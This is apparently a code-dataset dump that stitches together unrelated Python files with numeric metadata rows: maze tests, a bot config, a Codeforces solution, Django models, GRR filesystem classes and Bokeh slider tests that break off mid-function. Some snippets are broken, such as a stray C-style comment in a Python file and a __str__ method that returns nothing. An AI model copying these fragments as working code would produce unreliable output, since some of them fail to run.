maze.setName("Testing")
assert maze.getName() == "Testing"
def test_maze_fill_pound(self):
maze = Maze(5,5)
assert maze[0][0].getElement() == '#'
def test_maze_fill_space(self):
maze = Maze(5,5)
assert maze[4][4].getElement() != ' '
def test_maze_image_null(self):
maze = Maze(5,5)
assert maze.getMazeImage() == []
def test_maze_eimage_null(self):
maze = Maze(5,5)
assert maze.getMazeEnhancedImage() == []
def test_maze_len(self):
maze = Maze(5,10)
assert len(maze) == 10
class TestingMazeGenerated:
pass
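test_min_width and test_min_height above imply that the Maze constructor clamps small dimensions up to 5. A minimal sketch of that clamping rule (a hypothetical helper for illustration, not the real Maze class):

```python
MIN_SIZE = 5

def clamp_dimension(n: int) -> int:
    # Maze(2, 2) reports 5x5 in the tests above, so anything below
    # the minimum is assumed to be raised to MIN_SIZE
    return max(n, MIN_SIZE)

assert clamp_dimension(2) == 5
assert clamp_dimension(20) == 20
```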
| 21.686567 | 66 | 0.56435 | 192 | 1,453 | 4.104167 | 0.276042 | 0.106599 | 0.182741 | 0.148477 | 0.27665 | 0.27665 | 0.22335 | 0.071066 | 0 | 0 | 0 | 0.043222 | 0.299381 | 1,453 | 66 | 67 | 22.015152 | 0.730845 | 0.011012 | 0 | 0.209302 | 0 | 0 | 0.018881 | 0 | 0 | 0 | 0 | 0 | 0.27907 | 1 | 0.27907 | false | 0.023256 | 0.046512 | 0 | 0.372093 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
9c5f66a2f0ca4ba171ec371ccf0ee812ca588744 | 346 | py | Python | configs.py | jikkubot/Fotmob-Updates-Bot | edd09c5600ae297a1ce5dce52dea11b86471445b | [
"MIT"
] | 25 | 2021-08-23T20:55:47.000Z | 2022-03-25T09:04:09.000Z | configs.py | lusifernoob/Fotmob-Updates-Bot | ca5cb79760cc0493d81f1d562c203e519cf5dc26 | [
"MIT"
] | 1 | 2021-09-10T19:39:19.000Z | 2022-03-18T15:16:18.000Z | configs.py | lusifernoob/Fotmob-Updates-Bot | ca5cb79760cc0493d81f1d562c203e519cf5dc26 | [
"MIT"
] | 13 | 2021-08-23T20:55:52.000Z | 2021-12-19T11:14:08.000Z | # (c) @AbirHasan2005
import os
from dotenv import load_dotenv
load_dotenv("configs.env")
class Config(object):
API_ID = int(os.environ.get("API_ID", "123"))
API_HASH = os.environ.get("API_HASH", "")
BOT_TOKEN = os.environ.get("BOT_TOKEN", "")
STATUS_UPDATE_CHANNEL_ID = int(os.environ.get("STATUS_UPDATE_CHANNEL_ID", "-100"))
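The Config pattern above reads every setting from the environment with string defaults, casting the numeric ones with `int()`. A small sketch of how the integer fields behave when a variable is set versus left at its default (values here are placeholders, not real credentials):

```python
import os

os.environ["API_ID"] = "42"  # placeholder value
os.environ.pop("STATUS_UPDATE_CHANNEL_ID", None)  # ensure it is unset

api_id = int(os.environ.get("API_ID", "123"))
channel = int(os.environ.get("STATUS_UPDATE_CHANNEL_ID", "-100"))  # falls back

assert api_id == 42
assert channel == -100
```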
| 24.714286 | 86 | 0.696532 | 52 | 346 | 4.365385 | 0.480769 | 0.15859 | 0.211454 | 0.123348 | 0.14978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033557 | 0.138728 | 346 | 13 | 87 | 26.615385 | 0.728188 | 0.052023 | 0 | 0 | 0 | 0 | 0.199387 | 0.07362 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
9c6dc2ec12bcdc7cf5d323bb7a17f617da75b93b | 219 | py | Python | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | 1 | 2021-05-05T17:05:03.000Z | 2021-05-05T17:05:03.000Z | A/A 1367 Short Substrings.py | zielman/Codeforces-solutions | 636f11a9eb10939d09d2e50ddc5ec53327d0b7ab | [
"MIT"
] | null | null | null | # https://codeforces.com/problemset/problem/1367/A
t = int(input())
for i in range(t):
s = input()
ss = [s[0]]
for i in range(0, len(s)-1, 2):
        ss.append(s[i + 1])
print(''.join(ss)) | 24.333333 | 50 | 0.520548 | 40 | 219 | 2.85 | 0.575 | 0.070175 | 0.105263 | 0.192982 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05988 | 0.237443 | 219 | 9 | 51 | 24.333333 | 0.622754 | 0.219178 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
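Problem 1367A reconstructs a string from the concatenation of all its length-2 substrings; the loop above is equivalent to keeping the first character plus every second character from index 1. As a pure function:

```python
def reconstruct(b: str) -> str:
    # "abac" -> "ab"+"ba"+"ac" = "abbaac"; invert by taking b[0]
    # and then every second character starting at index 1
    return b[0] + b[1::2]

assert reconstruct("abbaac") == "abac"
assert reconstruct("ac") == "ac"
```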
92bdccb96dbb5c109bb2969b899dd510785c9b91 | 4,431 | py | Python | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | techminer2/column_explorer.py | jdvelasq/techminer2 | ad64a49402749755798a18417c38a7ad10e83bad | [
"MIT"
] | null | null | null | """
Column Explorer
===============================================================================
"""
# import ipywidgets as widgets
# from IPython.display import display
# from ipywidgets import GridspecLayout, Layout
# from .dashboard import document_to_html
# from .utils import load_filtered_documents
# class _App:
# def __init__(self, directory, top_n=100):
# # Data
# self.documents = read_filtered_records(directory)
# columns = sorted(self.documents.columns)
# # Left panel controls
# self.command_panel = [
# widgets.HTML("<hr><b>Column:</b>", layout=Layout(margin="0px 0px 0px 5px")),
# widgets.Dropdown(
# description="",
# value=columns[0],
# options=columns,
# layout=Layout(width="auto"),
# style={"description_width": "130px"},
# ),
# widgets.HTML("<hr><b>Term:</b>", layout=Layout(margin="0px 0px 0px 5px")),
# widgets.Dropdown(
# description="",
# value=None,
# options=[],
# layout=Layout(width="auto"),
# style={"description_width": "130px"},
# ),
# widgets.HTML(
# "<hr><b>Found documents:</b>", layout=Layout(margin="0px 0px 0px 5px")
# ),
# widgets.Select(
# options=[],
# layout=Layout(height="360pt", width="auto"),
# ),
# ]
# # interactive output function
# widgets.interactive_output(
# f=self.interactive_output,
# controls={
# "column": self.command_panel[1],
# "value": self.command_panel[3],
# "article_title": self.command_panel[5],
# },
# )
# # Grid size (Generic)
# self.app_layout = GridspecLayout(
# max(9, len(self.command_panel) + 1), 4, height="700px"
# )
# # Creates command panel (Generic)
# self.app_layout[:, 0] = widgets.VBox(
# self.command_panel,
# layout=Layout(
# margin="10px 8px 5px 10px",
# ),
# )
# # Output area (Generic)
# self.output = widgets.Output() # .add_class("output_color")
# self.app_layout[0:, 1:] = widgets.VBox(
# [self.output],
# layout=Layout(margin="10px 4px 4px 4px", border="1px solid gray"),
# )
# # self.execute()
# def run(self):
# return self.app_layout
# def execute(self):
# with self.output:
# column = self.column
# documents = self.documents.copy()
# documents[column] = documents[column].str.split("; ")
# x = documents.explode(column)
# # populate terms
# all_terms = x[column].copy()
# all_terms = all_terms.dropna()
# all_terms = all_terms.drop_duplicates()
# all_terms = all_terms.sort_values()
# self.command_panel[3].options = all_terms
# #
# # Populate titles
# #
# keyword = self.command_panel[3].value
# s = x[x[column] == keyword]
# s = s[["global_citations", "document_title"]]
# s = s.sort_values(
# ["global_citations", "document_title"], ascending=[False, True]
# )
# s = s[["document_title"]].drop_duplicates()
# self.command_panel[5].options = s["document_title"].tolist()
# #
# # Print info from selected title
# #
# out = self.documents[
# self.documents["document_title"] == self.command_panel[5].value
# ]
# out = out.reset_index(drop=True)
# out = out.iloc[0]
# self.output.clear_output()
# with self.output:
# display(widgets.HTML(document_to_html(out)))
# def interactive_output(self, **kwargs):
# for key in kwargs.keys():
# setattr(self, key, kwargs[key])
# self.execute()
# def column_explorer(directory, top_n=100):
# """
# Column explorer
# :param directory:
# :param top_n:
# :return:
# """
# app = _App(directory, top_n)
# return app.run()
| 30.558621 | 90 | 0.491537 | 418 | 4,431 | 5.062201 | 0.303828 | 0.062382 | 0.075614 | 0.019849 | 0.155009 | 0.134216 | 0.134216 | 0.134216 | 0.134216 | 0.116257 | 0 | 0.019923 | 0.354322 | 4,431 | 144 | 91 | 30.770833 | 0.719678 | 0.937937 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92c375fabeaa672ec431990d3bd539864c5d8113 | 546 | py | Python | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | tabcmd/parsers/publish_samples_parser.py | WillAyd/tabcmd | 1ba4a6ce1586b5ec4286aca0edff0fbaa1c69f15 | [
"MIT"
] | null | null | null | from .global_options import *
class PublishSamplesParser:
"""
Parser to the command publishsamples
"""
@staticmethod
def publish_samples_parser(manager, command):
"""Method to parse publish samples arguments passed by the user"""
publish_samples_parser = manager.include(command)
publish_samples_parser.add_argument('--name', '-n', dest='projectname', required=True,
help='The name of the project.')
set_parent_project_arg(publish_samples_parser)
| 34.125 | 94 | 0.657509 | 58 | 546 | 5.965517 | 0.637931 | 0.202312 | 0.231214 | 0.156069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254579 | 546 | 15 | 95 | 36.4 | 0.850123 | 0.177656 | 0 | 0 | 0 | 0 | 0.100467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92cbca4e71088b5e97ea0542862e94280199e7e0 | 1,275 | py | Python | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | Website/Members/models.py | sdeusch/django_member_management | ff649ce2845ac6774d6a4187d716349e7eb4a7b8 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Member(models.Model):
'''A Member is a unique User that can belong to different Accounts (Insurers) '''
    first_name = models.CharField(max_length=100)
    last_name = models.CharField(max_length=100)
    phone_number = models.IntegerField()
    client_member_id = models.IntegerField()
def __str__(self):
return self.first_name + ' ' + self.last_name
class Account(models.Model):
''' An instance of this class represents a mapping of a Member to an Account
Uniqueness is guaranteed by a uniqueness constraint in the Meta class
@Todo: If we want to more attributes create new Model class
'''
    member = models.ForeignKey(Member, on_delete=models.CASCADE)
account_id = models.IntegerField()
class Meta:
constraints = [
models.UniqueConstraint(name='account_member_uq', fields=['account_id', 'member'])
]
def __str__(self):
return self.member.first_name + ' ' + self.member.last_name + ', Account ' + str(self.account_id)
class MemberCSVFileUpload(models.Model):
'''Our CSV file upload class'''
fname = models.CharField(max_length=500)
file = models.FileField(upload_to='uploads/csv/')
def __str__(self):
self.fname
| 31.875 | 105 | 0.687059 | 164 | 1,275 | 5.152439 | 0.45122 | 0.033136 | 0.063905 | 0.085207 | 0.12071 | 0.073373 | 0 | 0 | 0 | 0 | 0 | 0.008955 | 0.211765 | 1,275 | 39 | 106 | 32.692308 | 0.831841 | 0.239216 | 0 | 0.136364 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0.136364 | false | 0 | 0.045455 | 0.090909 | 0.818182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
92d050a54b793ab4f24e2afb78b309d96c4437e7 | 253 | py | Python | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | tests/integration/empty/python/__main__.py | CDMiXer/Woolloomooloo | 62272b869dbc0190fd20540607b33f3edeba9dce | [
"Apache-2.0",
"MIT"
] | null | null | null | # Copyright 2016-2018, Pulumi Corporation. All rights reserved./* Release version [11.0.0-RC.2] - prepare */
/* add verbiage to sweeping and power washing section */
def main():
return None
if __name__ == "__main__":
main()
| 31.625 | 109 | 0.679842 | 35 | 253 | 4.685714 | 0.885714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077295 | 0.181818 | 253 | 7 | 110 | 36.142857 | 0.714976 | 0.422925 | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
92d880f3124626875e2e13909f732e31f733c0af | 1,791 | py | Python | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | python/RASCUNHOS/busca_termos.py | raquelmachado4993/omundodanarrativagit | eb8cebcc74514ba8449fab5f9dc5e9a93a826850 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
teste = ["ERA UMA VEZ um rei que vivia num reino distante, com a sua filha pequena, que se chamava Branca de Neve. O rei, como se sentia só, voltou a casar, achando que também seria bom para a sua filha ter uma nova mãe. A nova rainha era uma mulher muito bela mas também muito má, e não gostava de Branca de Neve que, quanto mais crescia, mais bela se tornava. A rainha malvada tinha um espelho mágico, ao qual perguntava, todos os dias: - Espelho meu, espelho meu, haverá mulher mais bela do que eu? E o espelho respondia: - Não minha rainha, és tu a mulher mais bela!"]
resposta = ''.join(teste)
resposta_minuscula = resposta.lower()
pesquisar_esportes = ['futebol', 'vôlei', 'tênis de mesa', 'natação', 'futsal', 'capoeira', 'skate', 'skatismo', 'surf', 'vôlei de praia', 'badminton', 'frescobol', 'judô', 'atletismo', 'críquete', 'basquete', 'hockey na grama', 'hockey no gelo', 'beisebol', 'fórmula 1', 'Rugby', 'futebol americano', 'golfe', 'handebol', 'queimado', 'hipismo', 'ginástica olímpica', 'Triatlo', 'maratona', 'canoagem', 'peteca', 'jiu-jitsu', 'esgrima', 'vale-tudo', 'karatê', 'corrida', 'ciclismo', 'boxe', 'MMA', 'Taekwondo']
print(len(pesquisar_esportes))
# pesquisa = ''.join(pesquisar_esportes)
for i in pesquisar_esportes:
if i in resposta_minuscula:
        print("achei", i)
    if i not in resposta_minuscula:
        naoachei = "nao achei"
        if naoachei == 'nao achei':
            print(naoachei)
# else:
# if i not in resposta_minuscula:
# print ("Nao achei")
# else:
# if i not in resposta_minuscula:
# print ("nao achei")
# for i in pesquisar_esportes:
# if i not in resposta_minuscula:
# print ("nao achei")
# | 51.171429 | 576 | 0.649358 | 243 | 1,791 | 4.740741 | 0.555556 | 0.088542 | 0.082465 | 0.083333 | 0.170139 | 0.170139 | 0.148438 | 0.105903 | 0.105903 | 0.072917 | 0 | 0.001441 | 0.225014 | 1,791 | 35 | 577 | 51.171429 | 0.82853 | 0.150195 | 0 | 0 | 0 | 0.083333 | 0.607025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
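The match/no-match bookkeeping in the loop above can be written as two list comprehensions over the lowered text; a standalone sketch with toy data:

```python
text = "era uma vez um rei que jogava futebol e andava de skate"
sports = ["futebol", "skate", "judô"]

found = [s for s in sports if s in text]
missing = [s for s in sports if s not in text]

assert found == ["futebol", "skate"]
assert missing == ["judô"]
```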
92e040274c2ed03d4c59987a718faff9f8df3508 | 2,456 | py | Python | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 1 | 2021-07-24T17:22:50.000Z | 2021-07-24T17:22:50.000Z | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-28T03:40:31.000Z | 2022-02-28T03:40:52.000Z | Incident-Response/Tools/grr/grr/client/grr_response_client/unprivileged/filesystem/filesystem.py | sn0b4ll/Incident-Playbook | cf519f58fcd4255674662b3620ea97c1091c1efb | [
"MIT"
] | 2 | 2022-02-25T08:34:51.000Z | 2022-03-16T17:29:44.000Z | #!/usr/bin/env python
"""Common code and abstractions for filesystem implementations."""
import abc
from typing import Dict, Optional, Iterable
from grr_response_client.unprivileged.proto import filesystem_pb2
class Error(Exception):
"""Base class for filesystem error."""
pass
class StaleInodeError(Error):
"""The inode provided to open a file is stale / outdated."""
pass
class Device(abc.ABC):
"""A device underlying a filesystem."""
@abc.abstractmethod
def Read(self, offset: int, size: int) -> bytes:
"""Reads from the file."""
pass
class File(abc.ABC):
"""An open file."""
def __init__(self, filesystem: "Filesystem"):
self.filesystem = filesystem
@abc.abstractmethod
def Read(self, offset: int, size: int) -> bytes:
"""Read from a file at the given offset."""
pass
@abc.abstractmethod
def Close(self) -> None:
"""Close the file."""
pass
@abc.abstractmethod
def ListFiles(self) -> Iterable[filesystem_pb2.StatEntry]:
"""Lists files in a directory.
If the file is a regular file, lists alternate data streams.
"""
pass
@abc.abstractmethod
def Stat(self) -> filesystem_pb2.StatEntry:
"""Returns information about the file."""
pass
@abc.abstractmethod
def Inode(self) -> int:
"""Returns the inode number of the file."""
pass
@abc.abstractmethod
def LookupCaseInsensitive(self, name: str) -> Optional[str]:
"""Looks up a name in case insensitive mode.
Args:
name: Case-insensitive name to match.
Returns: the case-literal name or None if the case-insensitive name couldn't
be found.
"""
pass
class Filesystem(abc.ABC):
"""A filesystem implementation."""
def __init__(self, device: Device):
self.device = device
@abc.abstractmethod
def Open(self, path: str, stream_name: Optional[str]) -> File:
pass
@abc.abstractmethod
def OpenByInode(self, inode: int, stream_name: Optional[str]) -> File:
pass
class Files:
"""A collection of open files identified by integer ids."""
def __init__(self):
self._table = {} # type: Dict[int, File]
self._file_id_counter = 0
def Add(self, file: File) -> int:
file_id = self._file_id_counter
self._file_id_counter += 1
self._table[file_id] = file
return file_id
def Remove(self, file_id: int) -> None:
del self._table[file_id]
def Get(self, file_id: int) -> File:
return self._table[file_id]
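The id-allocation behaviour of Files is easy to verify; here is a standalone copy of the class driven with a plain object standing in for an open File:

```python
class Files:
    """A collection of open files identified by integer ids."""

    def __init__(self):
        self._table = {}
        self._file_id_counter = 0

    def Add(self, file):
        file_id = self._file_id_counter
        self._file_id_counter += 1
        self._table[file_id] = file
        return file_id

    def Remove(self, file_id):
        del self._table[file_id]

    def Get(self, file_id):
        return self._table[file_id]

files = Files()
fake_file = object()  # stand-in for an open File
fid = files.Add(fake_file)

assert fid == 0
assert files.Get(fid) is fake_file
files.Remove(fid)
assert files.Add(object()) == 1  # ids keep counting up, never reused
```

Note that removing a file does not recycle its id, so ids handed out to callers stay unambiguous for the lifetime of the collection.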
| 22.53211 | 80 | 0.673453 | 329 | 2,456 | 4.908815 | 0.334347 | 0.037152 | 0.111455 | 0.089164 | 0.178947 | 0.166563 | 0.073065 | 0.073065 | 0.073065 | 0.073065 | 0 | 0.002565 | 0.206433 | 2,456 | 108 | 81 | 22.740741 | 0.826065 | 0.300896 | 0 | 0.407407 | 0 | 0 | 0.006192 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.203704 | 0.055556 | 0.018519 | 0.481481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
92e0c3513f2ba0bf6e00b5b4cf0a62637fc82592 | 8,317 | py | Python | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | 1 | 2021-04-09T02:57:29.000Z | 2021-04-09T02:57:29.000Z | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | 1 | 2021-04-21T19:44:07.000Z | 2021-04-21T19:44:07.000Z | tests/unit/bokeh/models/widgets/test_slider.py | goncaloperes/bokeh | b857d2d17d7c19779bb0a7be2601d8238fb1d5e9 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2021, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import logging
from datetime import date, datetime
# Bokeh imports
from bokeh.core.properties import UnsetValueError
from bokeh.core.validation.check import check_integrity
from bokeh.util.logconfig import basicConfig
from bokeh.util.serialization import convert_date_to_datetime, convert_datetime_type
# Module under test
import bokeh.models.widgets.sliders as mws # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
# needed for caplog tests to function
basicConfig()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class TestSlider:
def test_value_and_value_throttled(self) -> None:
s0 = mws.Slider(start=0, end=10)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.Slider(start=0, end=10, value=5)
assert s1.value == 5
assert s1.value_throttled == 5
class TestRangeSlider:
def test_value_and_value_throttled(self) -> None:
s0 = mws.RangeSlider(start=0, end=10)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.RangeSlider(start=0, end=10, value=(4, 6))
assert s1.value == (4, 6)
assert s1.value_throttled == (4, 6)
def test_rangeslider_equal_start_end_exception(self) -> None:
start = 0
end = 0
with pytest.raises(ValueError):
mws.RangeSlider(start=start, end=end)
def test_rangeslider_equal_start_end_validation(self, caplog) -> None:
start = 0
end = 10
s = mws.RangeSlider(start=start, end=end)
#with caplog.at_level(logging.ERROR, logger='bokeh.core.validation.check'):
with caplog.at_level(logging.ERROR):
assert len(caplog.records) == 0
s.end = 0
check_integrity([s])
assert len(caplog.records) == 1
class TestDateSlider:
def test_value_and_value_throttled(self) -> None:
start = datetime(2021, 1, 1)
end = datetime(2021, 12, 31)
value = convert_date_to_datetime(datetime(2021, 2, 1))
s0 = mws.DateSlider(start=start, end=end)
with pytest.raises(UnsetValueError):
s0.value
with pytest.raises(UnsetValueError):
s0.value_throttled
s1 = mws.DateSlider(start=start, end=end, value=value)
assert s1.value == value
assert s1.value_throttled == value
def test_value_as_datetime_when_set_as_datetime(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateSlider(start=start, end=end, value=start)
assert s.value_as_datetime == start
def test_value_as_datetime_when_set_as_timestamp(self) -> None:
start = datetime(2017, 8, 9, 0, 0)
end = datetime(2017, 8, 10, 0, 0)
s = mws.DateSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=convert_datetime_type(start))
assert s.value_as_datetime == start
def test_value_as_date_when_set_as_date(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateSlider(start=start, end=end, value=end)
assert s.value_as_date == end
def test_value_as_date_when_set_as_timestamp(self) -> None:
start = date(2017, 8, 9)
end = date(2017, 8, 10)
s = mws.DateSlider(start=start, end=end,
# Bokeh serializes as ms since epoch, if they get set as numbers (e.g.)
# by client side update, this is the units they will be
value=convert_date_to_datetime(end))
assert s.value_as_date == end
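Several tests above lean on the ms-since-epoch convention mentioned in the comments. A sketch of that conversion for naive datetimes (an illustration of the convention, not the actual bokeh helper):

```python
from datetime import datetime, timezone

def to_millis(dt: datetime) -> float:
    # treat the naive datetime as UTC and scale seconds to milliseconds
    return dt.replace(tzinfo=timezone.utc).timestamp() * 1000.0

assert to_millis(datetime(1970, 1, 1)) == 0.0
assert to_millis(datetime(1970, 1, 2)) == 86400000.0
```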
class TestDateRangeSlider:
    def test_value_and_value_throttled(self) -> None:
        start = datetime(2021, 1, 1)
        end = datetime(2021, 12, 31)
        value = (convert_datetime_type(datetime(2021, 2, 1)), convert_datetime_type(datetime(2021, 2, 28)))
        s0 = mws.DateRangeSlider(start=start, end=end)
        with pytest.raises(UnsetValueError):
            s0.value
        with pytest.raises(UnsetValueError):
            s0.value_throttled
        s1 = mws.DateRangeSlider(start=start, end=end, value=value)
        assert s1.value == value
        assert s1.value_throttled == value

    def test_value_as_datetime_when_set_as_datetime(self) -> None:
        start = datetime(2017, 8, 9, 0, 0)
        end = datetime(2017, 8, 10, 0, 0)
        s = mws.DateRangeSlider(start=start, end=end, value=(start, end))
        assert s.value_as_datetime == (start, end)

    def test_value_as_datetime_when_set_as_timestamp(self) -> None:
        start = datetime(2017, 8, 9, 0, 0)
        end = datetime(2017, 8, 10, 0, 0)
        s = mws.DateRangeSlider(start=start, end=end,
                                # Bokeh serializes dates as ms since epoch; if values get
                                # set as numbers (e.g. by a client-side update), these are
                                # the units they will be in
                                value=(convert_datetime_type(start), convert_datetime_type(end)))
        assert s.value_as_datetime == (start, end)

    def test_value_as_datetime_when_set_mixed(self) -> None:
        start = datetime(2017, 8, 9, 0, 0)
        end = datetime(2017, 8, 10, 0, 0)
        s = mws.DateRangeSlider(start=start, end=end,
                                value=(start, convert_datetime_type(end)))
        assert s.value_as_datetime == (start, end)
        s = mws.DateRangeSlider(start=start, end=end,
                                value=(convert_datetime_type(start), end))
        assert s.value_as_datetime == (start, end)

    def test_value_as_date_when_set_as_date(self) -> None:
        start = date(2017, 8, 9)
        end = date(2017, 8, 10)
        s = mws.DateRangeSlider(start=start, end=end, value=(start, end))
        assert s.value_as_date == (start, end)

    def test_value_as_date_when_set_as_timestamp(self) -> None:
        start = date(2017, 8, 9)
        end = date(2017, 8, 10)
        s = mws.DateRangeSlider(start=start, end=end,
                                # Bokeh serializes dates as ms since epoch; if values get
                                # set as numbers (e.g. by a client-side update), these are
                                # the units they will be in
                                value=(convert_date_to_datetime(start), convert_date_to_datetime(end)))
        assert s.value_as_date == (start, end)

    def test_value_as_date_when_set_mixed(self) -> None:
        start = date(2017, 8, 9)
        end = date(2017, 8, 10)
        s = mws.DateRangeSlider(start=start, end=end,
